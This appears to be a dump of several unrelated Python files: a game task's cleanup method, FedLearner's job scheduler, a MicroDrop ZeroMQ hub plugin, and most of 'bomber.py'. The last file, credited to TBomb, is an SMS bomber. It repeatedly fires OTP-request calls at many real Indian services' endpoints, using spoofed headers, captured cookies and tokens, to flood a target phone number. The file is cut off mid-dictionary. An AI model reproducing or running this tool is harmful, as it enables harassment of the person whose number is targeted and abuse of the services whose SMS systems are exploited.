# Stop updating ingame variables
if hasattr(self, 'Variables'):
self.Variables.close()
print('Closing Task processes successful')
# Close FEEDER connections
if hasattr(self, 'PelletRewardDevices'):
if hasattr(self.PelletRewardDevices, 'close'):
print('Closing Pellet FEEDER connections...')
self.PelletRewardDevices.close()
print('Closing Pellet FEEDER connections successful.')
if hasattr(self, 'MilkRewardDevices'):
if hasattr(self.MilkRewardDevices, 'close'):
print('Closing Milk FEEDER connections...')
self.MilkRewardDevices.close()
print('Closing Milk FEEDER connections successful.')
# Close pygame engine
close_pygame()
self._closed = True
|
scheduler.py | # Copyright 2020 The FedLearner Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
# pylint: disable=broad-except
import os
import threading
import logging
import traceback
from fedlearner_webconsole.job.yaml_formatter import generate_job_run_yaml
from fedlearner_webconsole.db import db
from fedlearner_webconsole.dataset.import_handler import ImportHandler
from fedlearner_webconsole.workflow.models import Workflow, WorkflowState
from fedlearner_webconsole.job.models import Job, JobState, JobDependency
from fedlearner_webconsole.scheduler.transaction import TransactionManager
from fedlearner_webconsole.k8s_client import get_client
from fedlearner_webconsole.utils.k8s_client import CrdKind
class Scheduler(object):
def __init__(self):
self._condition = threading.Condition(threading.RLock())
self._running = False
self._terminate = False
self._thread = None
self._pending_workflows = []
self._pending_jobs = []
self._app = None
self._import_handler = ImportHandler()
def start(self, app, force=False):
if self._running:
if not force:
raise RuntimeError("Scheduler is already started")
self.stop()
self._app = app
with self._condition:
self._running = True
self._terminate = False
self._thread = threading.Thread(target=self._routine)
self._thread.daemon = True
self._thread.start()
self._import_handler.init(app)
logging.info('Scheduler started')
def stop(self):
if not self._running:
return
with self._condition:
self._terminate = True
self._condition.notify_all()
print('stopping')
self._thread.join()
self._running = False
logging.info('Scheduler stopped')
def wakeup(self, workflow_ids=None,
job_ids=None,
data_batch_ids=None):
with self._condition:
if workflow_ids:
if isinstance(workflow_ids, int):
workflow_ids = [workflow_ids]
self._pending_workflows.extend(workflow_ids)
if job_ids:
if isinstance(job_ids, int):
job_ids = [job_ids]
self._pending_jobs.extend(job_ids)
if data_batch_ids:
self._import_handler.schedule_to_handle(data_batch_ids)
self._condition.notify_all()
def _routine(self):
self._app.app_context().push()
interval = int(os.environ.get(
'FEDLEARNER_WEBCONSOLE_POLLING_INTERVAL', 60))
while True:
with self._condition:
notified = self._condition.wait(interval)
if self._terminate:
return
if notified:
workflow_ids = self._pending_workflows
self._pending_workflows = []
self._poll_workflows(workflow_ids)
job_ids = self._pending_jobs
self._pending_jobs = []
job_ids.extend([
jid for jid, in db.session.query(Job.id) \
.filter(Job.state == JobState.WAITING) \
.filter(Job.workflow_id in workflow_ids)])
self._poll_jobs(job_ids)
self._import_handler.handle(pull=False)
continue
workflows = db.session.query(Workflow.id).filter(
Workflow.target_state != WorkflowState.INVALID).all()
self._poll_workflows([wid for wid, in workflows])
jobs = db.session.query(Job.id).filter(
Job.state == JobState.WAITING).all()
self._poll_jobs([jid for jid, in jobs])
self._import_handler.handle(pull=True)
def _poll_workflows(self, workflow_ids):
logging.info('Scheduler polling %d workflows...', len(workflow_ids))
for workflow_id in workflow_ids:
try:
self._schedule_workflow(workflow_id)
except Exception as e:
logging.warning(
"Error while scheduling workflow %d:\n%s",
workflow_id, traceback.format_exc())
def _poll_jobs(self, job_ids):
logging.info('Scheduler polling %d jobs...', len(job_ids))
for job_id in job_ids:
try:
self._schedule_job(job_id)
except Exception as e:
logging.warning(
"Error while scheduling job %d:\n%s",
job_id, traceback.format_exc())
def _schedule_workflow(self, workflow_id):
logging.debug('Scheduling workflow %d', workflow_id)
tm = TransactionManager(workflow_id)
return tm.process()
def _schedule_job(self, job_id):
job = Job.query.get(job_id)
assert job is not None, 'Job %d not found'%job_id
if job.state != JobState.WAITING:
return job.state
deps = JobDependency.query.filter(
JobDependency.dst_job_id == job.id).all()
for dep in deps:
src_job = Job.query.get(dep.src_job_id)
assert src_job is not None, 'Job %d not found'%dep.src_job_id
if not src_job.is_complete():
return job.state
k8s_client = get_client()
yaml = generate_job_run_yaml(job)
try:
k8s_client.create_or_replace_custom_object(CrdKind.FLAPP, yaml,
job.project.
get_namespace())
except RuntimeError as e:
logging.error('Start job %d has Runtime error msg: %s'
, job_id, e.args)
return job.state
job.start()
db.session.commit()
return job.state
scheduler = Scheduler()
|
__init__.py | # coding: utf-8
from multiprocessing import Process
import logging
import signal
import threading
from asyncio_helpers import cancellable
from flatland import Form, String, Enum
from logging_helpers import _L
from zmq_plugin.bin.hub import run_hub
from zmq_plugin.hub import Hub
from zmq_plugin.plugin import Plugin as ZmqPlugin
import trollius as asyncio
from ...app_context import get_hub_uri
from ...plugin_helpers import AppDataController
from ...plugin_manager import (PluginGlobals, SingletonPlugin, IPlugin,
implements)
logger = logging.getLogger(__name__)
PluginGlobals.push_env('microdrop')
def _safe_run_hub(*args, **kwargs):
'''
.. versionadded:: 2.15.2
Wrap :func:`run_hub` to catch ``SIGINT`` signal (i.e., when `control-C` is
pressed).
'''
signal.signal(signal.SIGINT, lambda *args: None)
return run_hub(*args, **kwargs)
class MicroDropHub(Hub):
def on_command_recv(self, msg_frames):
try:
super(MicroDropHub, self).on_command_recv(msg_frames)
except Exception:
_L().error('Command socket message error.', exc_info=True)
class ZmqHubPlugin(SingletonPlugin, AppDataController):
"""
This class is automatically registered with the PluginManager.
"""
implements(IPlugin)
plugin_name = 'microdrop.zmq_hub_plugin'
'''
AppFields
---------
A flatland Form specifying application options for the current plugin.
Note that nested Form objects are not supported.
Since we subclassed AppDataController, an API is available to access and
modify these attributes. This API also provides some nice features
automatically:
-all fields listed here will be included in the app options dialog
(unless properties=dict(show_in_gui=False) is used)
-the values of these fields will be stored persistently in the microdrop
config file, in a section named after this plugin's name attribute
'''
AppFields = Form.of(
String.named('hub_uri').using(optional=True, default='tcp://*:31000'),
Enum.named('log_level').using(default='info', optional=True)
.valued('debug', 'info', 'warning', 'error', 'critical'))
def __init__(self):
self.name = self.plugin_name
self.hub_process = None
#: ..versionadded:: 2.25
self.exec_thread = None
def on_plugin_enable(self):
'''
.. versionchanged:: 2.25
Start asyncio event loop in background thread to process ZeroMQ hub
execution requests.
'''
super(ZmqHubPlugin, self).on_plugin_enable()
app_values = self.get_app_values()
self.cleanup()
self.hub_process = Process(target=_safe_run_hub,
args=(MicroDropHub(app_values['hub_uri'],
self.name),
getattr(logging,
app_values['log_level']
.upper())))
# Set process as daemonic so it terminate when main process terminates.
self.hub_process.daemon = True
self.hub_process.start()
_L().info('ZeroMQ hub process (pid=%s, daemon=%s)',
self.hub_process.pid, self.hub_process.daemon)
zmq_ready = threading.Event()
@asyncio.coroutine
def _exec_task():
self.zmq_plugin = ZmqPlugin('microdrop', get_hub_uri())
self.zmq_plugin.reset()
zmq_ready.set()
event = asyncio.Event()
try:
yield asyncio.From(event.wait())
except asyncio.CancelledError:
_L().info('closing ZeroMQ execution event loop')
self.zmq_exec_task = cancellable(_exec_task)
self.exec_thread = threading.Thread(target=self.zmq_exec_task)
self.exec_thread.deamon = True
self.exec_thread.start()
zmq_ready.wait()
def cleanup(self):
'''
.. versionchanged:: 2.25
Stop asyncio event loop.
'''
if self.hub_process is not None:
self.hub_process.terminate()
self.hub_process = None
if self.exec_thread is not None:
self.zmq_exec_task.cancel()
self.exec_thread = None
PluginGlobals.pop_env()
|
bomber.py | #!/usr/bin/env python
from datetime import datetime
import os
import hashlib
import sys
import time
import threading
import string
import random
import base64
import urllib.request
import urllib.parse
try:
import requests
except ImportError:
print('[!] Error: some dependencies are not installed')
print('Type \'pip install -r requirements.txt\' to install all required packages')
exit()
colors=['\033[1;31m','\033[1;32m','\033[1;33m','\033[1;34m','\033[1;35m','\033[1;36m']
W='\033[0m'
# The Credit For This Code Goes To SpeedX And All Other Contributors Listed At https://github.com/TheSpeedX/TBomb
# If You Wanna Take Credits For This Code, Please Look Yourself Again
country_codes = {
'93': 'AF',
'355': 'AL',
'213': 'DZ',
'376': 'AD',
'244': 'AO',
'672': 'AQ',
'54': 'AR',
'374': 'AM',
'297': 'AW',
'61': 'AU',
'43': 'AT',
'994': 'AZ',
'973': 'BH',
'880': 'BD',
'375': 'BY',
'32': 'BE',
'501': 'BZ',
'229': 'BJ',
'975': 'BT',
'591': 'BO',
'387': 'BA',
'267': 'BW',
'55': 'BR',
'246': 'IO',
'673': 'BN',
'359': 'BG',
'226': 'BF',
'257': 'BI',
'855': 'KH',
'237': 'CM',
'238': 'CV',
'236': 'CF',
'235': 'TD',
'56': 'CL',
'86': 'CN',
'57': 'CO',
'269': 'KM',
'682': 'CK',
'506': 'CR',
'385': 'HR',
'53': 'CU',
'599': 'AN',
'357': 'CY',
'420': 'CZ',
'243': 'CD',
'45': 'DK',
'253': 'DJ',
'670': 'TL',
'593': 'EC',
'20': 'EG',
'503': 'SV',
'240': 'GQ',
'291': 'ER',
'372': 'EE',
'251': 'ET',
'500': 'FK',
'298': 'FO',
'679': 'FJ',
'358': 'FI',
'33': 'FR',
'689': 'PF',
'241': 'GA',
'220': 'GM',
'995': 'GE',
'49': 'DE',
'233': 'GH',
'350': 'GI',
'30': 'GR',
'299': 'GL',
'502': 'GT',
'224': 'GN',
'245': 'GW',
'592': 'GY',
'509': 'HT',
'504': 'HN',
'852': 'HK',
'36': 'HU',
'354': 'IS',
'91': 'IN',
'62': 'ID',
'98': 'IR',
'964': 'IQ',
'353': 'IE',
'972': 'IL',
'39': 'IT',
'225': 'CI',
'81': 'JP',
'962': 'JO',
'254': 'KE',
'686': 'KI',
'383': 'XK',
'965': 'KW',
'996': 'KG',
'856': 'LA',
'371': 'LV',
'961': 'LB',
'266': 'LS',
'231': 'LR',
'218': 'LY',
'423': 'LI',
'370': 'LT',
'352': 'LU',
'853': 'MO',
'389': 'MK',
'261': 'MG',
'265': 'MW',
'60': 'MY',
'960': 'MV',
'223': 'ML',
'356': 'MT',
'692': 'MH',
'222': 'MR',
'230': 'MU',
'262': 'RE',
'52': 'MX',
'691': 'FM',
'373': 'MD',
'377': 'MC',
'976': 'MN',
'382': 'ME',
'212': 'EH',
'258': 'MZ',
'95': 'MM',
'264': 'NA',
'674': 'NR',
'977': 'NP',
'31': 'NL',
'687': 'NC',
'64': 'NZ',
'505': 'NI',
'227': 'NE',
'234': 'NG',
'683': 'NU',
'850': 'KP',
'47': 'SJ',
'968': 'OM',
'92': 'PK',
'680': 'PW',
'970': 'PS',
'507': 'PA',
'675': 'PG',
'595': 'PY',
'51': 'PE',
'63': 'PH',
'48': 'PL',
'351': 'PT',
'974': 'QA',
'242': 'CG',
'40': 'RO',
'7': 'RU',
'250': 'RW',
'590': 'MF',
'290': 'SH',
'508': 'PM',
'685': 'WS',
'378': 'SM',
'239': 'ST',
'966': 'SA',
'221': 'SN',
'381': 'RS',
'248': 'SC',
'232': 'SL',
'65': 'SG',
'421': 'SK',
'386': 'SI',
'677': 'SB',
'252': 'SO',
'27': 'ZA',
'82': 'KR',
'211': 'SS',
'34': 'ES',
'94': 'LK',
'249': 'SD',
'597': 'SR',
'268': 'SZ',
'46': 'SE',
'41': 'CH',
'963': 'SY',
'886': 'TW',
'992': 'TJ',
'255': 'TZ',
'66': 'TH',
'228': 'TG',
'690': 'TK',
'676': 'TO',
'216': 'TN',
'90': 'TR',
'993': 'TM',
'688': 'TV',
'256': 'UG',
'380': 'UA',
'971': 'AE',
'44': 'GB',
'1': 'US',
'598': 'UY',
'998': 'UZ',
'678': 'VU',
'379': 'VA',
'58': 'VE',
'84': 'VN',
'681': 'WF',
'967': 'YE',
'260': 'ZM',
'263': 'ZW'
}
def clr():
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
def banner():
clr()
logo="""
██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ██╗ ██╗███████╗
██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗╚██╗██╔╝██╔════╝
███████║███████║██║ █████╔╝ █████╗ ██████╔╝ ╚███╔╝ ███████╗
██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗ ██╔██╗ ╚════██║
██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║██╔╝ ██╗███████║
╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝
"""
print(random.choice(colors)+logo+W)
print("\n")
count_inf = 0
def infinite(pn, dl, ch, max):
global count_inf
while True:
while os.path.exists('proc.xxx'):
time.sleep(0.5)
os.system('touch proc.xxx')
api = random.choice(ch)
try:
ret = getapi(pn, api, 91)
except Exception:
ret = False
if not ret:
while ch.count(api) > 0:
ch.remove(api)
continue
os.system('rm proc.xxx >/dev/null 2>&1')
count_inf += 1
# os.system('echo SpeedX >> count.xxx')
time.sleep(float(dl))
if (count_inf > maxlim):
exit()
def checkinternet():
res = False
try:
# requests.get('https://www.google.com', verify=True)
requests.get('https://www.google.com')
res = False
except Exception:
res = True
if res:
print("\n\n\tIt seems That Your Internet Speed is Slow or You Are Using Proxies...")
print('\t\tTBomb Will Stop Now...\n\n')
banner()
exit()
def getapi(pn,lim,cc):
cc=str(cc)
pn=str(pn)
lim = int(lim)
url = ["https://www.oyorooms.com/api/pwa/generateotp?country_code=%2B" +
str(cc) + "&nod=4&phone=" + pn, "https://direct.delhivery.com/delhiverydirect/order/generate-otp?phoneNo=" + pn, "https://securedapi.confirmtkt.com/api/platform/register?mobileNumber=" + pn]
try:
if lim < len(url):
urllib.request.urlopen(str(url[lim]))
return True
except (urllib.error.HTTPError, urllib.error.URLError):
return False
if lim == 3:
headers = {
'Host': 'pharmeasy.in',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate, br',
'Referer': 'https://pharmeasy.in/',
'Content-Type': 'application/json',
'Content-Length': '30',
'Connection': 'keep-alive',
}
data = {"contactNumber":pn}
response = requests.post('https://pharmeasy.in/api/auth/requestOTP', headers=headers, json=data)
return response.status_code==200
elif lim == 4:
cookies = {
'_ga': 'GA1.2.1273460610.1561191565',
'_gid': 'GA1.2.172574299.1561191565',
'_gcl_au': '1.1.833556660.1561191566',
'_fbp': 'fb.1.1561191568709.1707722126',
'PHPSESSID': 'm5tap7nr75b2ehcn8ur261oq86',
}
headers={
'Host': 'www.heromotocorp.com',
'Connection': 'keep-alive',
'Content-Length': '126',
'Accept': '*/*',
'Origin': 'https://www.heromotocorp.com',
'X-Requested-With': 'XMLHttpRequest',
'Save-Data': 'on',
'User-Agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Referer': 'https://www.heromotocorp.com/en-in/xpulse200/',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
}
data = {
'mobile_no': pn,
'randome': 'ZZUC9WCCP3ltsd/JoqFe5HHe6WfNZfdQxqi9OZWvKis=',
'mobile_no_otp': '',
'csrf': '523bc3fa1857c4df95e4d24bbd36c61b'
}
response = requests.post('https://www.heromotocorp.com/en-in/xpulse200/ajax_data.php', headers=headers, cookies=cookies, data=data)
return response.status_code==200
elif lim == 5:
cookies = {
'Cookie:_ga': 'GA1.2.1483885314.1559157646',
'_fbp': 'fb.1.1559157647161.1989205138',
'TiPMix': '91.9909185226964',
'gcb_t_track': 'SEO - Google',
'gcb_t_keyword': '',
'gcb_t_l_url': 'https://www.google.com/',
'gcb_utm_medium': '',
'gcb_utm_campaign': '',
'ASP.NET_SessionId': 'ioqkek5lbgvldlq4i3cmijcs',
'web_app_landing_utm_source': '',
'web_app_landing_url': '/personal-loan',
'webapp_landing_referral_url': 'https://www.google.com/',
'ARRAffinity': '747e0c2664f5cb6179583963d834f4899eee9f6c8dcc773fc05ce45fa06b2417',
'_gid': 'GA1.2.969623705.1560660444',
'_gat': '1',
'current_url': 'https://indialends.com/personal-loan',
'cookies_plbt': '0',
}
headers = {
'Host': 'indialends.com',
'Connection': 'keep-alive',
'Content-Length': '75',
'Accept': '*/*',
'Origin': 'https://indialends.com',
'X-Requested-With': 'XMLHttpRequest',
'Save-Data': 'on',
'User-Agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Referer': 'https://indialends.com/personal-loan',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
}
data = {
'aeyder03teaeare': '1',
'ertysvfj74sje': cc,
'jfsdfu14hkgertd': pn,
'lj80gertdfg': '0'
}
response = requests.post('https://indialends.com/internal/a/mobile-verification_v2.ashx', headers=headers, cookies=cookies, data=data)
return True
elif lim == 6:
headers = {
'host': 'www.flipkart.com',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0',
'accept': '*/*',
'accept-language': 'en-US,en;q=0.5',
'accept-encoding': 'gzip, deflate, br',
'referer': 'https://www.flipkart.com/',
'x-user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 FKUA/website/41/website/Desktop',
'origin': 'https://www.flipkart.com',
'connection': 'keep-alive',
'Content-Type': 'application/json; charset=utf-8'}
data = {"loginId":["+"+cc+pn],"supportAllStates":true}
response = requests.post('https://www.flipkart.com/api/6/user/signup/status', headers=headers, json=data)
return True
elif lim == 7:
cookies = {
'Cookie:T': 'BR%3Acjvqzhglu1mzt95aydzhvwzq1.1558031092050',
'SWAB': 'build-44be9e47461a74d737914207bcbafc30',
'lux_uid': '155867904381892986',
'AMCVS_17EB401053DAF4840A490D4C%40AdobeOrg': '1',
'AMCV_17EB401053DAF4840A490D4C%40AdobeOrg': '-227196251%7CMCIDTS%7C18041%7CMCMID%7C63273353035509304576927719203948933246%7CMCAID%7CNONE%7CMCOPTOUT-1558686245s%7CNONE%7CMCAAMLH-1559283845%7C12%7CMCAAMB-1559283845%7Cj8Odv6LonN4r3an7LhD3WZrU1bUpAkFkkiY1ncBR96t2PTI',
's_cc': 'true',
'SN': '2.VI8085A6A237EB4C62836C8809F0D312EB.SI21A9EC4E99B949B2ACE6361B3F0208CC.VS187649B2B06A44C69824006710CB6D83.1558679078',
'gpv_pn': 'HomePage',
'gpv_pn_t': 'Homepage',
'S': 'd1t17GQVqPz9KPzobP3M4GQkjPy34TjfJxI4SbXVIvhwzm3mE13vfSEulmf90D/7L710qUpMq8mA0k2bx6b2DuwIS4g==',
's_sq': '%5B%5BB%5D%5D'}
headers = {
'Host': 'www.flipkart.com',
'Connection': 'keep-alive',
'Content-Length': '60',
'X-user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36 FKUA/website/41/website/Desktop',
'Origin': 'https://www.flipkart.com',
'Save-Data': 'on',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': '*/*',
'Referer': 'https://www.flipkart.com/',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
}
data = {
'loginId': '+'+cc+pn,
'state': 'VERIFIED',
'churnEmailRequest': 'false'
}
response = requests.post('https://www.flipkart.com/api/5/user/otp/generate', headers=headers, cookies=cookies, data=data)
return True
elif lim == 8:
headers = {
'Host': 'www.ref-r.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate, br',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Content-Length': '26',
'DNT': '1',
'Connection': 'keep-alive',
}
data = {
'mobile': pn,
'submit': '1',
'undefined': ''
}
response = requests.post('https://www.ref-r.com/clients/lenskart/smsApi', headers=headers, data=data)
return True
elif lim == 9:
headers = {
'X-DROID-VERSION': '4.12.5',
'API-Version': '2.0',
'user-agent': 'samsung SM-G9350 0 4.4.2',
'client-version': 'Android-4.12.5',
'X-DROID-VERSION-CODE': '158',
'Accept': 'application/json',
'client-name': 'Practo Android App',
'Content-Type': 'application/x-www-form-urlencoded',
'Host': 'accounts.practo.com',
'Connection': 'Keep-Alive',
'Content-Length': '96'}
data = {
'client_name': 'Practo Android App',
'mobile': '+'+cc+pn,
'fingerprint': '',
'device_name':'samsung+SM-G9350'}
response = requests.post( "https://accounts.practo.com/send_otp", headers=headers, data=data)
rd=response.text
# rd = os.popen('curl -s -X POST -H "X-DROID-VERSION:4.12.5" -H "API-Version:2.0" -H "user-agent:samsung SM-G9350 0 4.4.2" -H "client-version:Android-4.12.5" -H "X-DROID-VERSION-CODE:158" -H "Accept:application/json" -H "client-name:Practo Android App" -H "Content-Type:application/x-www-form-urlencoded" -H "Host:accounts.practo.com" -H "Connection:Keep-Alive" -H "Content-Length:96" -d "client_name=Practo+Android+App&fingerprint=&mobile=%2B' + cc + pn + '&device_name=samsung+SM-G9350&" "https://accounts.practo.com/send_otp"').read()
return rd.find("success") != -1
elif lim == 10:
headers = {
'Host': 'm.pizzahut.co.in',
'content-length': '114',
'origin': 'https://m.pizzahut.co.in',
'authorization': 'Bearer ZXlKaGJHY2lPaUpJVXpJMU5pSXNJblI1Y0NJNklrcFhWQ0o5LmV5SmtZWFJoSWpwN0luUnZhMlZ1SWpvaWIzQXhiR0pyZEcxbGRYSTBNWEJyTlRGNWNqQjBkbUZsSWl3aVlYVjBhQ0k2SW1WNVNqQmxXRUZwVDJsS1MxWXhVV2xNUTBwb1lrZGphVTlwU2tsVmVra3hUbWxLT1M1bGVVcDFXVmN4YkdGWFVXbFBhVWt3VGtSbmFVeERTbmRqYld4MFdWaEtOVm96U25aa1dFSjZZVmRSYVU5cFNUVlBSMUY0VDBkUk5FMXBNV2xaVkZVMVRGUlJOVTVVWTNSUFYwMDFUV2t3ZWxwcVp6Vk5ha0V6V1ZSTk1GcHFXV2xNUTBwd1l6Tk5hVTlwU205a1NGSjNUMms0ZG1RelpETk1iVEZvWTI1U2NWbFhUbkpNYlU1MllsTTVhMXBZV214aVJ6bDNXbGhLYUdOSGEybE1RMHBvWkZkUmFVOXBTbTlrU0ZKM1QyazRkbVF6WkROTWJURm9ZMjVTY1ZsWFRuSk1iVTUyWWxNNWExcFlXbXhpUnpsM1dsaEthR05IYTJsTVEwcHNaVWhCYVU5cVJURk9WR3MxVG5wak1VMUVVWE5KYlRWcFdtbEpOazFVVlRGUFZHc3pUWHByZDA1SU1DNVRaM1p4UmxOZldtTTNaSE5pTVdSNGJWVkdkSEExYW5WMk9FNTVWekIyZDE5TVRuTkJNbWhGVkV0eklpd2lkWEJrWVhSbFpDSTZNVFUxT1RrM016a3dORFUxTnl3aWRYTmxja2xrSWpvaU1EQXdNREF3TURBdE1EQXdNQzB3TURBd0xUQXdNREF0TURBd01EQXdNREF3TURBd0lpd2laMlZ1WlhKaGRHVmtJam94TlRVNU9UY3pPVEEwTlRVM2ZTd2lhV0YwSWpveE5UVTVPVGN6T1RBMExDSmxlSEFpT2pFMU5qQTRNemM1TURSOS5CMGR1NFlEQVptTGNUM0ZHM0RpSnQxN3RzRGlJaVZkUFl4ZHIyVzltenk4',
'x-source-origin': 'PWAFW',
'content-type': 'application/json',
'accept': 'application/json, text/plain, */*',
'user-agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36',
'save-data': 'on',
'languagecode': 'en',
'referer': 'https://m.pizzahut.co.in/login',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
'cookie': 'AKA_A2=A'}
data = {"customer":{"MobileNo":pn,"UserName":pn,"merchantId":"98d18d82-ba59-4957-9c92-3f89207a34f6"}}
response = requests.post('https://m.pizzahut.co.in/api/cart/send-otp?langCode=en', headers=headers, data=data)
return True
elif lim == 11:
headers = {
'host': 'www.goibibo.com',
'user-agent': 'Mozilla/5.0 (Windows NT 8.0; Win32; x32; rv:58.0) Gecko/20100101 Firefox/57.0',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'accept-language': 'en-US,en;q=0.5',
'accept-encoding': 'gzip, deflate, br',
'referer': 'https://www.goibibo.com/mobile/?sms=success',
'content-type': 'application/x-www-form-urlencoded',
'content-length': '14',
'connection': 'keep-alive',
'upgrade-insecure-requests': '1'}
data = {'mbl': pn}
response = requests.post('https://www.goibibo.com/common/downloadsms/', headers=headers, data=data)
return True
elif lim == 12:
headers = {
'Host': 'www.apollopharmacy.in',
'content-length': '17',
'accept': '*/*',
'origin': 'https://www.apollopharmacy.in',
'x-requested-with': 'XMLHttpRequest',
'save-data': 'on',
'user-agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36',
'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
'referer': 'https://www.apollopharmacy.in/sociallogin/mobile/login/',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
'cookie': 'section_data_ids=%7B%22cart%22%3A1560239751%7D'}
data = {'mobile': pn}
response = requests.post('https://www.apollopharmacy.in/sociallogin/mobile/sendotp/', headers=headers, data=data)
rd=response.text
return rd.find("sent") != -1
elif lim == 13:
cookies = {
'Cookie:_ga': 'GA1.2.979928319.1560364071',
'_gid': 'GA1.2.666270216.1560364071',
'V': '201',
'_fbp': 'fb.1.1560364076913.1528349725',
'cto_lwid': 'd91bea3a-7610-45aa-8f78-65a0d740fb46',
'PushSubscriberStatus': 'DENIED',
'peclosed': 'true',
'G_ENABLED_IDPS': 'google',
'TS018cc593': '01ef61aed0fca110f50d8e3be2c66eb83188f6df8495c0ed2cd772829370fc12690954aad0834f545b57764467dbb66efb05d481a8958aebb273751956ef9eb383a3ba22dd1c94d82021e9d4c40011d4ab9bd97c6f0a74628ac12e8f7bcb663c1608e7288ebd252051cb84def3b021d3bcf643d3f3728ca9c0d9c780d171578ba966774f11ac44864a7f3da59791cb55f2741f23d72f7843efe9306459c00ec2e5f00065729a8573baba42384bb7cf46eb55cf89f72f1dcd5619a26e4ff32c63d06cac8c4bb158da6640bc0b11193134cbf38050ae0db230aa258b1181749fb0373afe041ad1aeffd0c08be7a62010db02cc65edfb1341d2de54cdf475c5dcd84e16c64c50',
'_gac_UA-68002030-1': '1.1560366197.Cj0KCQjwxYLoBRCxARIsAEf16-tx5UXrrP9SEhR8dPkTL4a9woEF7Ae-kvSlzKdgq35y31DeK3_uhg8aAkRBEALw_wcB',
'cdigiMrkt': 'utm_source%3A%7Cutm_medium%3A%7Cdevice%3Amobile%7Cexpires%3AFri%2C%2012%20Jul%202019%2019%3A03%3A17%20GMT%7C',
'ImpressionCookie': '4',
'ip': '10.1.10.1',
'sessionStatus': 'true|undefined',
'FirstPage': 'Thu Jun 13 2019 00:33:53 GMT+0530 (India Standard Time)',
'_dc_gtm_UA-68002030-1': '1',
'uI': 'johnyaho%40gmail.com',
'TS01fe4249': '01ef61aed09c32c6a53ce9e431a6a719c416867f2f3ad713fde2e74175bc248acc7a523f41e9751d032859a159bfff87664b90c3d0a9dfb2392f75876ccbe273b8a8e81d7a8d25047453c17a2905eca7eff26b780c'}
headers = {
'Host': 'www.ajio.com',
'Connection': 'keep-alive',
'Content-Length': '144',
'Accept': 'application/json',
'Origin': 'https://www.ajio.com',
'User-Agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36',
'content-type': 'application/json',
'Referer': 'https://www.ajio.com/signup',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6'}
data = {"firstName":"SpeedX","login":"johnyaho@gmail.com","password":"Rock@5star","genderType":"Male","mobileNumber":"0000","requestType":"SENDOTP"}
response = requests.post('https://www.ajio.com/api/auth/signupSendOTP', headers=headers, cookies=cookies, json=data)
rd=response.text
if rd.find("\"statusCode\":\"1\"") != -1:
return True
else:
return False
elif lim == 14:
headers = {
'Host': 'api.cloud.altbalaji.com',
'Connection': 'keep-alive',
'Accept': 'application/json, text/plain, */*',
'Origin': 'https://lite.altbalaji.com',
'Save-Data': 'on',
